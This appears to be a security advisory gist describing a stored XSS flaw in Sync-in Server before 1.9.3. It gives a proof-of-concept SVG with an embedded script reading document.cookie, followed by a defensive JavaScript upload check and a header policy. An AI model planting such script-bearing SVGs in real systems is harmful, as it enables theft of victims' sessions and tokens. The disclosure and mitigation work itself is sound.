@x0root
Last active February 1, 2026 05:57
Sync-in stored XSS vulnerability
Vulnerability: Stored Cross-Site Scripting (XSS) in Sync-in Server
Affected Versions: < 1.9.3
Fixed Version: 1.9.3
Reported Date: 12/06/2025
Researcher: x0root
Technical Details
Type: Stored Cross-Site Scripting (XSS)
Attack Vector: Remote
Impact: Information Disclosure, Privilege Escalation
Description
A stored cross-site scripting vulnerability exists in Sync-in Server versions prior to 1.9.3. Authenticated attackers can upload malicious SVG files containing JavaScript payloads. When victims access the raw SVG file URL directly, the embedded JavaScript executes within the victim's browser context under the Sync-in domain. This allows theft of CSRF tokens, session cookies, and other sensitive data.
Affected Component
· Raw file viewer endpoint serving SVG content without proper sanitization
· File upload functionality accepting SVG files
Proof of Concept
1. Authenticate to the Sync-in instance
2. Upload an SVG file containing:
```svg
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain)
alert(document.cookie)
alert("xss")
</script>
</svg>
```
3. Share the raw file URL with the victim
4. When the victim opens the raw URL, the embedded JavaScript executes
Mitigation
· Upgrade to Sync-in Server version 1.9.3 or later
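Added defensive example, not Sync-in's own code: an upload-time check that flags active content in an SVG (the `<script>` element used in the proof of concept above, plus event-handler attributes, `javascript:` links, `foreignObject` and entity declarations), and a header policy for a raw-file endpoint that forces SVG to download and, if it is rendered anyway, applies a CSP that blocks scripts and sandboxes the document away from the application origin. Function names and the sample SVGs are constructed for this example.

```javascript
// Added example (not Sync-in's code). Names and sample inputs are constructed.
const RISKY_SVG_PATTERNS = [
  { name: 'script element', re: /<\s*script\b/i },
  { name: 'event handler attribute', re: /\son[a-z]+\s*=/i },
  { name: 'javascript: URL', re: /(?:href|xlink:href)\s*=\s*["']?\s*javascript:/i },
  { name: 'foreignObject element', re: /<\s*foreignObject\b/i },
  { name: 'entity declaration', re: /<!ENTITY\b/i },
];

// Return the names of active-content constructs found in an SVG document.
// This is a coarse upload-time gate, not a sanitizer: the authoritative
// control is the header policy below, applied whatever this returns.
function findActiveContent(svgText) {
  return RISKY_SVG_PATTERNS.filter(p => p.re.test(svgText)).map(p => p.name);
}

// Headers for serving a user-uploaded file from a raw-file endpoint.
// SVG is always sent as an attachment; the CSP covers the case where a
// browser still renders it (e.g. via a navigation to the URL): no scripts,
// and 'sandbox' gives the document an opaque origin, so document.cookie
// and same-origin requests against the application are unavailable.
function rawFileHeaders(contentType, fileName) {
  const safeName = fileName.replace(/["\r\n]/g, ''); // no quote/CRLF header injection
  const headers = {
    'X-Content-Type-Options': 'nosniff',
    'Content-Disposition': `attachment; filename="${safeName}"`,
  };
  if (/^image\/svg\+xml/i.test(contentType)) {
    headers['Content-Type'] = 'image/svg+xml';
    headers['Content-Security-Policy'] = "default-src 'none'; style-src 'unsafe-inline'; sandbox";
  } else {
    headers['Content-Type'] = contentType;
  }
  return headers;
}

// Constructed samples: one carrying a <script> element as in the PoC, one benign.
const SAMPLE_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><polygon points="0,0 0,50 50,0"/>' +
  '<script>alert(document.domain)</script></svg>';
const SAFE_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10"/></svg>';

console.log(findActiveContent(SAMPLE_SVG)); // ['script element']
console.log(rawFileHeaders('image/svg+xml', 'triangle.svg'));
```

Rejecting uploads on a non-empty `findActiveContent` result is a useful early signal, but only the download-or-sandbox header policy removes the execution context that makes the stored payload dangerous.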
References
· GitHub Release (Fix): https://github.com/Sync-in/server/releases/tag/v1.9.3
· GitHub Gist: https://gist.github.com/x0root/86db30af91bb0e1707eb7e57a049b6ad